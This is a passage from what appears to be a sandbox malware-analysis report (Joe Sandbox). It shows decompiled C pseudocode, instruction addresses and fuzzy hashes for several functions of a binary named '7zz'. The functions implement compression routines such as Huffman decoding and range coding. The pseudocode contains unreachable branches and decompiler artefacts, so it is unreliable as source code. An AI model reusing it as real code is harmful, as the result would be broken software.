				unsigned int _t250;
				signed int _t251;
				intOrPtr* _t257;
				int _t258;
				intOrPtr _t259;
				intOrPtr _t261;
				char _t266;
				signed int _t274;
				intOrPtr* _t275;
				void* _t278;
				int _t281;
				void* _t284;
				intOrPtr _t287;
				unsigned int _t291;
				signed int _t294;
				signed int _t298;
				signed int _t301;
				signed int _t302;
				void* _t303;
				void* _t304;
				void* _t305;

				_t303 = __ecx;
				_t281 = 0;
				goto L1;
				L3:
				while(0 <= 0x10) {
					 *_t257 = 0xffffffff;
					_t202 = _t202 + 1;
					_t257 = _t257 + 4;
					 *((intOrPtr*)(_t305 + 0x3c)) =  *((intOrPtr*)(_t305 + 0x3c)) + 1;
					if(_t202 < 0x14) {
						continue;
					} else {
						_t274 = 0;
						_t141 = 0;
						 *((intOrPtr*)(_t305 + 0x3c)) = 0;
						 *((intOrPtr*)(_t303 + 0x1648)) = 0;
						 *((intOrPtr*)(_t303 + 0x168c)) = 0;
						 *((intOrPtr*)(_t305 + 0x10)) = 0;
						_t258 = 1;
						while(1) {
							_t284 = _t305 + 0x3c + _t258 * 4;
							_t274 = _t274 + ( *(_t305 + 0x3c + _t258 * 4) << 0x10 - _t258);
							 *(_t305 + 0x1c) = _t274;
							if(_t274 > 0x10000) {
								goto L50;
							}
							_t205 = 0x10000;
							if(_t258 != 0x10) {
								_t205 = _t274;
							}
							 *(_t303 + 0x1648 + _t258 * 4) = _t205;
							_t207 =  *((intOrPtr*)(_t303 + 0x1688 + _t258 * 4)) +  *((intOrPtr*)(_t284 - 4));
							 *((intOrPtr*)(_t303 + 0x168c + _t258 * 4)) = _t207;
							 *((intOrPtr*)(_t305 + 0x80 + _t258 * 4)) = _t207;
							if(_t258 <= 9) {
								_t249 =  *(_t303 + 0x1648 + _t258 * 4) >> 7;
								if(_t141 < _t249) {
									_t42 = _t303 + 0x1720; // 0x1720
									_t278 = _t141 + _t42;
									_t250 = _t249 - _t141;
									 *(_t305 + 0x18) = _t250;
									_t302 = _t250;
									_t251 = _t250 >> 2;
									memset(_t278 + _t251, memset(_t278, _t258, _t251 << 2), (_t302 & 0x00000003) << 0);
									_t305 = _t305 + 0x18;
									_t274 =  *(_t305 + 0x1c);
									_t141 =  *((intOrPtr*)(_t305 + 0x10)) + _t302;
									 *((intOrPtr*)(_t305 + 0x10)) = _t141;
								}
							}
							_t258 = _t258 + 1;
							if(_t258 <= 0x10) {
								continue;
							} else {
								_t259 = 0;
								do {
									if(0 != 0) {
										_t208 =  *(_t305 + 0x80);
										 *((intOrPtr*)(_t303 + 0x16d0 + _t208 * 4)) = _t259;
										 *(_t305 + 0x80) = _t208 + 1;
									}
									_t259 = _t259 + 1;
								} while (_t259 < 0x14);
								_t190 = 0;
								 *((intOrPtr*)(_t305 + 0x20)) = 0;
								if( *((intOrPtr*)(_t305 + 0xd0)) <= 0) {
									L51:
									return 1;
								} else {
									_t146 =  *((intOrPtr*)(_t305 + 0xc8));
									_t210 = _t146;
									_t287 =  *((intOrPtr*)(_t305 + 0xcc)) - _t146;
									 *((intOrPtr*)(_t305 + 0x10)) = _t210;
									 *((intOrPtr*)(_t305 + 0x24)) = _t287;
									L19:
									while(1) {
										if(_t190 == 0) {
											_t275 = _t303 + 8;
											_t291 =  *(_t303 + 0x28) >> 0x0000000f -  *((intOrPtr*)(_t303 + 0x2c)) >> 0x00000001 & 0x0000ffff;
											if(_t291 >=  *((intOrPtr*)(_t303 + 0x166c))) {
												_t149 = _t303 + 0x1670;
												_t191 = 0xa;
												if(_t291 >=  *((intOrPtr*)(_t303 + 0x1670))) {
													do {
														_t247 =  *((intOrPtr*)(_t149 + 4));
														_t149 = _t149 + 4;
														_t191 = _t191 + 1;
													} while (_t291 >= _t247);
												}
											} else {
												_t191 =  *((intOrPtr*)((_t291 >> 7) + _t303 + 0x1720));
											}
											_t215 =  *((intOrPtr*)(_t275 + 0x24)) + _t191;
											 *((intOrPtr*)(_t275 + 0x24)) = _t215;
											if(_t215 >= 0x10) {
												do {
													_t167 =  *_t275;
													if(_t167 <  *((intOrPtr*)(_t275 + 4))) {
														 *(_t305 + 0x18) =  *_t167;
														 *_t275 = _t167 + 1;
													} else {
														 *(_t305 + 0x18) = E0040E070(_t275);
													}
													_t169 =  *_t275;
													if(_t169 <  *((intOrPtr*)(_t275 + 4))) {
														 *(_t305 + 0x1c) =  *_t169;
														 *_t275 = _t169 + 1;
													} else {
														 *(_t305 + 0x1c) = E0040E070(_t275);
													}
													_t244 =  *((intOrPtr*)(_t275 + 0x24)) + 0xfffffff0;
													 *((intOrPtr*)(_t275 + 0x24)) = _t244;
													 *(_t275 + 0x20) = ( *(_t275 + 0x20) << 0x00000008 |  *(_t305 + 0x1c) & 0x000000ff) << 0x00000008 |  *(_t305 + 0x18) & 0x000000ff;
												} while (_t244 >= 0x10);
											}
											_t294 = (_t291 -  *((intOrPtr*)(_t303 + 0x1644 + _t191 * 4)) >> 0x10 - _t191) +  *((intOrPtr*)(_t303 + 0x168c + _t191 * 4));
											if(_t294 >= 0x14) {
												goto L50;
											} else {
												_t219 =  *((intOrPtr*)(_t303 + 0x16d0 + _t294 * 4));
												if(_t219 != 0x11) {
													if(_t219 != 0x12) {
														if(_t219 == 0x13) {
															_t151 = E00450B20(1);
															_t261 =  *((intOrPtr*)(_t275 + 0x24));
															_t190 = _t151 + 4;
															_t298 =  *(_t275 + 0x20) >> 0x0000000f - _t261 >> 0x00000001 & 0x0000ffff;
															if(_t298 >=  *((intOrPtr*)(_t303 + 0x166c))) {
																_t153 = _t303 + 0x1670;
																 *(_t305 + 0x14) = 0xa;
																if(_t298 >=  *((intOrPtr*)(_t303 + 0x1670))) {
																	do {
																		_t153 = _t153 + 4;
																		 *(_t305 + 0x14) =  *(_t305 + 0x14) + 1;
																	} while (_t298 >=  *_t153);
																}
															} else {
																 *(_t305 + 0x14) = 0;
															}
															 *((intOrPtr*)(_t275 + 0x24)) = _t261 +  *(_t305 + 0x14);
															E00450FC0(_t275);
															_t301 = (_t298 -  *((intOrPtr*)(_t303 + 0x1644 +  *(_t305 + 0x14) * 4)) >> 0x10 -  *(_t305 + 0x14)) +  *((intOrPtr*)(_t303 + 0x168c +  *(_t305 + 0x14) * 4));
															if(_t301 >= 0x14) {
																goto L50;
															} else {
																_t219 =  *((intOrPtr*)(_t303 + 0x16d0 + _t301 * 4));
																if( *((intOrPtr*)(_t303 + 0x16d0 + _t301 * 4)) > 0x10) {
																	goto L50;
																} else {
																	goto L47;
																}
															}
														} else {
															if(_t219 > 0x10) {
																goto L50;
															} else {
																_t190 = 1;
																L47:
																goto L48;
															}
														}
													} else {
														_t190 = E00450B20(5) + 0x14;
														_t266 = 0;
														goto L48;
													}
												} else {
													_t190 = E00450B20(4) + 4;
													_t266 = 0;
													goto L48;
												}
											}
										} else {
											 *((char*)(_t287 + _t210)) = _t266;
											 *_t210 = _t266;
											 *((intOrPtr*)(_t305 + 0x20)) =  *((intOrPtr*)(_t305 + 0x20)) + 1;
											 *((intOrPtr*)(_t305 + 0x10)) = _t210 + 1;
											_t190 = _t190 - 1;
											L48:
											if( *((intOrPtr*)(_t305 + 0x20)) >=  *((intOrPtr*)(_t305 + 0xd0))) {
												goto L51;
											} else {
												_t210 =  *((intOrPtr*)(_t305 + 0x10));
												_t287 =  *((intOrPtr*)(_t305 + 0x24));
												continue;
											}
										}
										goto L52;
									}
								}
							}
							goto L52;
						}
						break;
					}
					L52:
				}
				L50:
				return 0;
				goto L52;
				L1:
				 *((char*)(_t304 + _t281 + 0x28)) = E00450B20(4);
				_t281 = _t281 + 1;
				if(_t281 < 0x14) {
					goto L1;
				} else {
					_t257 = __ecx + 0x16d0;
					memset(_t304 + 0x40, 0, 0x10 << 2);
					_t305 = _t304 + 0xc;
					_t202 = 0;
				}
				goto L3;
			}

0x00450bdc
0x00450bde
0x00450bde
0x00000000
0x00450c08
0x00450c20
0x00450c26
0x00450c27
0x00450c2d
0x00450c2f
0x00000000
0x00450c31
0x00450c31
0x00450c33
0x00450c35
0x00450c39
0x00450c3f
0x00450c45
0x00450c49
0x00450c4e
0x00450c52
0x00450c5f
0x00450c67
0x00450c6b
0x00000000
0x00000000
0x00450c74
0x00450c79
0x00450c7b
0x00450c7b
0x00450c80
0x00450c8e
0x00450c93
0x00450c9a
0x00450ca1
0x00450caa
0x00450caf
0x00450cb1
0x00450cb1
0x00450cb8
0x00450cbc
0x00450cc2
0x00450cce
0x00450cd8
0x00450cd8
0x00450cde
0x00450ce4
0x00450ce6
0x00450ce6
0x00450caf
0x00450cea
0x00450cee
0x00000000
0x00450cf4
0x00450cf4
0x00450cf6
0x00450cfe
0x00450d00
0x00450d0e
0x00450d16
0x00450d16
0x00450d18
0x00450d19
0x00450d25
0x00450d29
0x00450d33
0x00450fa9
0x00450fb2
0x00450d39
0x00450d39
0x00450d47
0x00450d49
0x00450d4b
0x00450d4f
0x00000000
0x00450d53
0x00450d55
0x00450d76
0x00450d8a
0x00450d92
0x00450daa
0x00450db2
0x00450db7
0x00450db9
0x00450db9
0x00450dbc
0x00450dbf
0x00450dc0
0x00450db9
0x00450d94
0x00450d9b
0x00450d9b
0x00450dc7
0x00450dcb
0x00450dd1
0x00450dd3
0x00450dd3
0x00450dda
0x00450dec
0x00450df0
0x00450ddc
0x00450de3
0x00450de3
0x00450df2
0x00450df9
0x00450e0b
0x00450e0f
0x00450dfb
0x00450e02
0x00450e02
0x00450e33
0x00450e38
0x00450e3b
0x00450e40
0x00450dd3
0x00450e57
0x00450e61
0x00000000
0x00450e67
0x00450e67
0x00450e71
0x00450e8b
0x00450ea5
0x00450ebe
0x00450ec3
0x00450eda
0x00450edf
0x00450ee7
0x00450f03
0x00450f0b
0x00450f13
0x00450f15
0x00450f19
0x00450f1d
0x00450f23
0x00450f15
0x00450ee9
0x00450ef7
0x00450ef7
0x00450f2f
0x00450f32
0x00450f4d
0x00450f57
0x00000000
0x00450f59
0x00450f59
0x00450f63
0x00000000
0x00000000
0x00000000
0x00000000
0x00450f63
0x00450ea7
0x00450eaa
0x00000000
0x00450eb0
0x00450eb0
0x00450f65
0x00000000
0x00450f79
0x00450eaa
0x00450e8d
0x00450e98
0x00450e9b
0x00000000
0x00450e9b
0x00450e73
0x00450e7e
0x00450e81
0x00000000
0x00450e81
0x00450e71
0x00450d57
0x00450d5b
0x00450d5e
0x00450d62
0x00450d66
0x00450d6a
0x00450f7b
0x00450f88
0x00000000
0x00450f8a
0x00450f8a
0x00450f8e
0x00000000
0x00450f8e
0x00450f88
0x00000000
0x00450d55
0x00450d53
0x00450d33
0x00000000
0x00450cee
0x00000000
0x00450c4e
0x00000000
0x00450c2f
0x00450f9a
0x00450fa3
0x00000000
0x00450be0
0x00450be9
0x00450bed
0x00450bf1
0x00000000
0x00450bf3
0x00450bfe
0x00450c04
0x00450c04
0x00450c06
0x00450c06
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18eb27e6422edd7d087eaa85b9cb47c4f35199851569dbc48901ad76aac91017
Instruction ID: ad5e04536eb3a377db8700aff306818d5d26cec6f51285805bcfce31696dce2f
Opcode Fuzzy Hash: 18eb27e6422edd7d087eaa85b9cb47c4f35199851569dbc48901ad76aac91017
Instruction Fuzzy Hash: 5BB1D8367043458FDB28CE28D5906AEB7E1BBC5309F15093EEC86D7782C775A909CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0044CA40 Relevance: .3, Instructions: 305
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E0044CA40(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi) {
				signed int _t120;
				signed int _t122;
				signed char _t123;
				signed char _t126;
				signed int _t129;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				signed int _t152;
				signed int _t165;
				signed char _t172;
				signed char _t177;
				signed char _t178;
				signed char _t179;
				intOrPtr* _t193;
				intOrPtr _t266;
				intOrPtr _t277;
				intOrPtr _t289;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				intOrPtr* _t297;
				intOrPtr _t299;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				intOrPtr _t308;
				void* _t309;

				_t299 = __ecx;
				 *((intOrPtr*)(_t309 + 8)) = __ecx;
				E0044C9C0(__ecx + 0xd7c, __ecx + 0x73c, 0x120);
				E0044C9C0(__ecx + 0x11fc, __ecx + 0x85c, 0x20);
				_t120 = 0;
				 *((intOrPtr*)(_t309 + 0xc)) = 0;
				if( *((intOrPtr*)(__ecx + 0x508)) > 0) {
					do {
						_t193 =  *((intOrPtr*)(_t299 + 0x4a8)) + _t120 * 4;
						 *((intOrPtr*)(_t309 + 0x20)) = _t193;
						_t122 =  *_t193;
						if(_t122 < 0x8000) {
							_t123 = _t122 & 0x0000ffff;
							 *(_t309 + 0x14) = _t123;
							_t297 = _t299 + 0x470;
							 *((intOrPtr*)(_t309 + 0x1c)) = 0;
							_t172 =  *(_t299 + 0x1180);
							_t291 = 0;
							__eflags = 0;
							if(0 > 0) {
								while(1) {
									_t152 =  *(_t297 + 0x28);
									__eflags = _t291 - _t152;
									if(_t291 < _t152) {
										break;
									}
									_t291 = _t291 - _t152;
									 *( *((intOrPtr*)(_t297 + 4)) +  *_t297) = _t172 << 0x00000008 - _t152 |  *(_t297 + 0x2c);
									_t308 =  *((intOrPtr*)(_t297 + 4)) + 1;
									 *((intOrPtr*)(_t297 + 4)) = _t308;
									__eflags = _t308 -  *((intOrPtr*)(_t297 + 8));
									if(__eflags == 0) {
										E0040EFBD(_t297, __eflags);
									}
									 *(_t297 + 0x28) = 8;
									_t172 = _t172 >>  *(_t297 + 0x28);
									__eflags = _t291;
									 *(_t297 + 0x2c) = 0;
									if(_t291 > 0) {
										continue;
									} else {
									}
									L16:
									_t123 =  *(_t309 + 0x14);
									_t299 =  *((intOrPtr*)(_t309 + 0x10));
									goto L17;
								}
								_t304 =  *(_t297 + 0x28);
								_t305 = _t304 - _t291;
								__eflags = _t305;
								 *(_t297 + 0x2c) =  *(_t297 + 0x2c) | ((0x00000001 << _t291) - 0x00000001 & _t172) << 0x00000008 - _t304;
								 *(_t297 + 0x28) = _t305;
								goto L16;
							}
							L17:
							_t292 = 0;
							__eflags = 0;
							_t177 = _t123;
							if(0 > 0) {
								while(1) {
									_t145 =  *(_t297 + 0x28);
									__eflags = _t292 - _t145;
									if(_t292 < _t145) {
										break;
									}
									_t292 = _t292 - _t145;
									 *( *_t297 +  *((intOrPtr*)(_t297 + 4))) = _t177 << 0x00000008 - _t145 |  *(_t297 + 0x2c);
									_t289 =  *((intOrPtr*)(_t297 + 4)) + 1;
									 *((intOrPtr*)(_t297 + 4)) = _t289;
									__eflags = _t289 -  *((intOrPtr*)(_t297 + 8));
									if(__eflags == 0) {
										E0040EFBD(_t297, __eflags);
									}
									 *(_t297 + 0x28) = 8;
									_t177 = _t177 >>  *(_t297 + 0x28);
									__eflags = _t292;
									 *(_t297 + 0x2c) = 0;
									if(_t292 > 0) {
										continue;
									} else {
									}
									goto L24;
								}
								_t146 =  *(_t297 + 0x28);
								_t147 = _t146 - _t292;
								__eflags = _t147;
								 *(_t297 + 0x2c) =  *(_t297 + 0x2c) | ((0x00000001 << _t292) - 0x00000001 & _t177) << 0x00000008 - _t146;
								 *(_t297 + 0x28) = _t147;
							}
							L24:
							_t126 =  *((intOrPtr*)( *((intOrPtr*)(_t309 + 0x20)) + 2));
							__eflags = 0 - 0x200;
							 *(_t309 + 0x14) = 0;
							if(0 >= 0x200) {
								_t301 = 0x10;
								__eflags = 0x10;
							} else {
								_t301 = 0;
							}
							_t178 =  *( *((intOrPtr*)(_t309 + 0x10)) + 0x11fc + _t301 * 4);
							_t293 = 0;
							__eflags = 0;
							if(0 > 0) {
								while(1) {
									_t137 =  *(_t297 + 0x28);
									__eflags = _t293 - _t137;
									if(_t293 < _t137) {
										break;
									}
									_t293 = _t293 - _t137;
									 *( *_t297 +  *((intOrPtr*)(_t297 + 4))) = _t178 << 0x00000008 - _t137 |  *(_t297 + 0x2c);
									_t277 =  *((intOrPtr*)(_t297 + 4)) + 1;
									 *((intOrPtr*)(_t297 + 4)) = _t277;
									__eflags = _t277 -  *((intOrPtr*)(_t297 + 8));
									if(__eflags == 0) {
										E0040EFBD(_t297, __eflags);
									}
									 *(_t297 + 0x28) = 8;
									_t178 = _t178 >>  *(_t297 + 0x28);
									__eflags = _t293;
									 *(_t297 + 0x2c) = 0;
									if(_t293 > 0) {
										continue;
									} else {
									}
									L34:
									_t126 =  *(_t309 + 0x14);
									goto L35;
								}
								_t138 =  *(_t297 + 0x28);
								_t139 = _t138 - _t293;
								__eflags = _t139;
								 *(_t297 + 0x2c) =  *(_t297 + 0x2c) | ((0x00000001 << _t293) - 0x00000001 & _t178) << 0x00000008 - _t138;
								 *(_t297 + 0x28) = _t139;
								goto L34;
							}
							L35:
							_t294 = 0;
							__eflags = 0;
							_t179 = _t126 -  *((intOrPtr*)(0x47c134 + _t301 * 4));
							if(0 > 0) {
								while(1) {
									_t129 =  *(_t297 + 0x28);
									__eflags = _t294 - _t129;
									if(_t294 < _t129) {
										goto L39;
									}
									_t294 = _t294 - _t129;
									E0042F593(_t179, _t297, _t179 << 0x00000008 - _t129 |  *(_t297 + 0x2c));
									 *(_t297 + 0x28) = 8;
									_t179 = _t179 >>  *(_t297 + 0x28);
									__eflags = _t294;
									 *(_t297 + 0x2c) = 0;
									if(__eflags > 0) {
										continue;
									} else {
									}
									goto L40;
								}
								goto L39;
							}
							goto L40;
						} else {
							_t297 = _t299 + 0x470;
							_t179 =  *(_t299 + 0xd7c);
							_t294 = 0;
							if(0 > 0) {
								while(1) {
									_t165 =  *(_t297 + 0x28);
									if(_t294 < _t165) {
										break;
									}
									_t294 = _t294 - _t165;
									 *( *((intOrPtr*)(_t297 + 4)) +  *_t297) = _t179 << 0x00000008 - _t165 |  *(_t297 + 0x2c);
									_t266 =  *((intOrPtr*)(_t297 + 4)) + 1;
									 *((intOrPtr*)(_t297 + 4)) = _t266;
									_t314 = _t266 -  *((intOrPtr*)(_t297 + 8));
									if(_t266 ==  *((intOrPtr*)(_t297 + 8))) {
										E0040EFBD(_t297, _t314);
									}
									 *(_t297 + 0x28) = 8;
									_t179 = _t179 >>  *(_t297 + 0x28);
									 *(_t297 + 0x2c) = 0;
									if(_t294 > 0) {
										continue;
									} else {
									}
									goto L41;
								}
								L39:
								_t302 =  *(_t297 + 0x28);
								_t303 = _t302 - _t294;
								__eflags = _t303;
								 *(_t297 + 0x2c) =  *(_t297 + 0x2c) | ((0x00000001 << _t294) - 0x00000001 & _t179) << 0x00000008 - _t302;
								 *(_t297 + 0x28) = _t303;
								L40:
								_t299 =  *((intOrPtr*)(_t309 + 0x10));
							}
						}
						L41:
						_t120 =  *(_t309 + 0x18) + 1;
						 *(_t309 + 0x18) = _t120;
					} while (_t120 <  *((intOrPtr*)(_t299 + 0x508)));
				}
				return E0044CDD0(_t299 + 0x470,  *((intOrPtr*)(_t299 + 0x117c)), 0);
			}

0x0044ca44
0x0044ca4b
0x0044ca5b
0x0044ca6e
0x0044ca79
0x0044ca7d
0x0044ca81
0x0044ca8a
0x0044ca90
0x0044ca93
0x0044ca97
0x0044ca9e
0x0044cb1b
0x0044cb24
0x0044cb2e
0x0044cb34
0x0044cb3f
0x0044cb46
0x0044cb48
0x0044cb4a
0x0044cb4c
0x0044cb4c
0x0044cb4f
0x0044cb51
0x00000000
0x00000000
0x0044cb58
0x0044cb6a
0x0044cb73
0x0044cb76
0x0044cb79
0x0044cb7b
0x0044cb7f
0x0044cb84
0x0044cb8b
0x0044cb92
0x0044cb94
0x0044cb96
0x0044cb9a
0x00000000
0x00000000
0x0044cb9c
0x0044cbc1
0x0044cbc1
0x0044cbc5
0x00000000
0x0044cbc5
0x0044cb9e
0x0044cbb9
0x0044cbb9
0x0044cbbb
0x0044cbbe
0x00000000
0x0044cbbe
0x0044cbc9
0x0044cbda
0x0044cbe3
0x0044cbe5
0x0044cbe7
0x0044cbe9
0x0044cbe9
0x0044cbec
0x0044cbee
0x00000000
0x00000000
0x0044cbf9
0x0044cc07
0x0044cc10
0x0044cc13
0x0044cc16
0x0044cc18
0x0044cc1c
0x0044cc1c
0x0044cc24
0x0044cc2b
0x0044cc2d
0x0044cc2f
0x0044cc33
0x00000000
0x00000000
0x0044cc35
0x00000000
0x0044cc33
0x0044cc37
0x0044cc52
0x0044cc52
0x0044cc54
0x0044cc57
0x0044cc57
0x0044cc5a
0x0044cc60
0x0044cc64
0x0044cc69
0x0044cc6d
0x0044cc8a
0x0044cc8a
0x0044cc6f
0x0044cc77
0x0044cc77
0x0044cc9a
0x0044cca1
0x0044cca3
0x0044cca5
0x0044cca7
0x0044cca7
0x0044ccaa
0x0044ccac
0x00000000
0x00000000
0x0044ccb3
0x0044ccc5
0x0044ccce
0x0044ccd1
0x0044ccd4
0x0044ccd6
0x0044ccda
0x0044ccda
0x0044cce2
0x0044cce9
0x0044cceb
0x0044cced
0x0044ccf1
0x00000000
0x00000000
0x0044ccf3
0x0044cd18
0x0044cd18
0x00000000
0x0044cd18
0x0044ccf5
0x0044cd10
0x0044cd10
0x0044cd12
0x0044cd15
0x00000000
0x0044cd15
0x0044cd1c
0x0044cd24
0x0044cd2f
0x0044cd31
0x0044cd33
0x0044cd35
0x0044cd35
0x0044cd38
0x0044cd3a
0x00000000
0x00000000
0x0044cd45
0x0044cd51
0x0044cd59
0x0044cd60
0x0044cd62
0x0044cd64
0x0044cd68
0x00000000
0x00000000
0x0044cd6a
0x00000000
0x0044cd68
0x00000000
0x0044cd35
0x00000000
0x0044caa0
0x0044caa8
0x0044cab5
0x0044cabc
0x0044cac0
0x0044cac6
0x0044cac6
0x0044cacb
0x00000000
0x00000000
0x0044cad6
0x0044cae8
0x0044caf1
0x0044caf4
0x0044caf7
0x0044caf9
0x0044cafd
0x0044cafd
0x0044cb05
0x0044cb0c
0x0044cb10
0x0044cb14
0x00000000
0x00000000
0x0044cb16
0x00000000
0x0044cb14
0x0044cd6c
0x0044cd6c
0x0044cd87
0x0044cd87
0x0044cd89
0x0044cd8c
0x0044cd8f
0x0044cd8f
0x0044cd8f
0x0044cac0
0x0044cd93
0x0044cd9d
0x0044cda0
0x0044cda0
0x0044cdac
0x0044cdcc

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5364b3d38da24dceb4fc74032ce6d375fea4b89270f7dfad01ac66195bbe4028
Instruction ID: f1a358e19409f11fecb9658b58595b2dff66520b4aac72c743e58953db3de8aa
Opcode Fuzzy Hash: 5364b3d38da24dceb4fc74032ce6d375fea4b89270f7dfad01ac66195bbe4028
Instruction Fuzzy Hash: B2B1C535205B418FD724DE39D4D02ABBBE2EFDA314F14892ED4DE87751DA34A90ACB48

Uniqueness

Uniqueness Score: -1.00%

Function 00466E30 Relevance: .3, Instructions: 302
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00466E30(signed int* __ecx, signed char* __edx) {
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				signed int __ebp;
				signed int _t240;
				signed int _t243;
				signed short _t246;
				signed int _t248;
				signed char* _t250;
				signed short* _t252;
				signed char* _t253;
				signed int _t255;
				signed int _t257;
				signed short* _t260;
				signed int _t263;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t273;
				signed int _t279;
				signed int _t283;
				void* _t284;
				signed int _t285;
				signed int _t288;
				signed int _t290;
				signed int _t294;
				signed int* _t302;
				signed int _t310;
				signed int _t312;
				signed int _t313;
				signed char* _t317;
				signed int _t318;
				signed char _t326;
				signed int _t328;
				signed int _t330;
				signed int* _t339;
				intOrPtr _t340;
				signed int _t346;
				signed int _t356;
				signed int _t358;
				signed int _t362;
				signed int _t369;
				signed int _t372;
				signed short* _t387;
				signed int _t389;
				signed char** _t396;
				signed int* _t399;
				signed int* _t402;
				signed char* _t406;
				signed char* _t409;
				void* _t412;
				void* _t413;

				_t302 = __ecx;
				_t413 = _t412 - 0x10c;
				_t396 = __ecx;
				_t240 =  *__ecx;
				 *(_t413 + 0x10) = __edx;
				if( *_t240 == 0) {
					_t406 = _t240 + 2;
					_t387 = __ecx + 0x1038 + ((( *( &(__ecx[0xcb]) + ( *(_t240 + 3) & 0x000000ff)) & 0x000000ff) << 6) + ( *( &(__ecx[0x8c]) + ( *( *(_t240 + 8)) & 0x000000ff)) & 0x000000ff) + (__ecx[7] >> 0x0000001a & 0x00000020) + ( *(_t240 + 1) & 0x000000ff) + __ecx[5]) * 2;
					__eflags = ( *_t406 & 0x000000ff) - __edx;
					if(( *_t406 & 0x000000ff) != __edx) {
						_t310 =  *_t387 & 0x0000ffff;
						_t243 = __ecx[0x12] >> 0xe;
						__ecx[0x14] = __ecx[0x14] + _t243 * _t310;
						__ecx[0x12] = (0x4000 - _t310) * _t243;
						E00466DF0(__ecx);
						_t146 = ( *_t387 & 0x0000ffff) + 0x20; // 0x20
						_t312 = _t146 >> 7;
						_t246 = ( *_t387 & 0x0000ffff) - _t312;
						 *_t387 = _t246;
						_t396[4] =  *(((_t246 & 0x0000ffff) >> 0xa) + 0x47c6bc) & 0x000000ff;
						_t248 = 0;
						_t313 = _t312 | 0xffffffff;
						do {
							 *(_t413 + 0x1c + _t248 * 4) = _t313;
							 *(_t413 + 0x20 + _t248 * 4) = _t313;
							 *(_t413 + 0x24 + _t248 * 4) = _t313;
							 *(_t413 + 0x28 + _t248 * 4) = _t313;
							 *(_t413 + 0x2c + _t248 * 4) = _t313;
							 *(_t413 + 0x30 + _t248 * 4) = _t313;
							 *(_t413 + 0x34 + _t248 * 4) = _t313;
							 *(_t413 + 0x38 + _t248 * 4) = _t313;
							_t248 = _t248 + 8;
							__eflags = _t248 - 0x40;
						} while (_t248 < 0x40);
						 *((char*)(_t413 + ( *_t406 & 0x000000ff) + 0x1c)) = 0;
						_t396[5] = 0;
						goto L35;
					} else {
						__ecx[0x12] = (__ecx[0x12] >> 0xe) * ( *_t387 & 0x0000ffff);
						E00466DF0(__ecx);
						_t140 = ( *_t387 & 0x0000ffff) + 0x20; // 0x20
						_t372 = _t140 >> 7;
						 *_t387 = ( *_t387 & 0x0000ffff) - _t372 - 0xffffff80;
						_t396[2] = _t406;
						_t339 = _t396;
						_pop(_t398);
						_t399 = _t339;
						_t279 = _t399[2];
						_t340 =  *((intOrPtr*)(_t279 + 1));
						__eflags = _t340 - 0xc4;
						 *((char*)(_t279 + 1)) = (_t372 & 0xffffff00 | _t340 - 0x000000c4 > 0x00000000) + _t340;
						_t399[7] = _t399[7] + 1;
						_t399[5] = 1;
						_t283 = ( *(_t399[2] + 4) & 0x0000ffff) << 0x00000010 |  *(_t399[2] + 2) & 0x0000ffff;
						__eflags = _t399[3];
						if(_t399[3] != 0) {
							L18:
							_t284 = E004661F0(_t399);
							 *_t399 = _t399[1];
							return _t284;
						} else {
							__eflags = _t283 - _t399[0xf];
							if(_t283 < _t399[0xf]) {
								goto L18;
							} else {
								_t399[1] = _t283;
								 *_t399 = _t283;
								return _t283;
							}
						}
					}
				} else {
					__edi =  *(__eax + 4);
					__ecx =  *__edi & 0x000000ff;
					__eflags = ( *__edi & 0x000000ff) - __edx;
					if(( *__edi & 0x000000ff) != __edx) {
						__edx =  *__esi;
						 *(__esi + 0x14) = 0;
						__ebx =  *__edx & 0x000000ff;
						__ebp =  *(__edi + 1) & 0x000000ff;
						__eax = __ebx;
						while(1) {
							__ecx =  *(__edi + 6) & 0x000000ff;
							__edi = __edi + 6;
							__eflags = __ecx -  *((intOrPtr*)(__esp + 0x10));
							__ecx =  *(__edi + 1) & 0x000000ff;
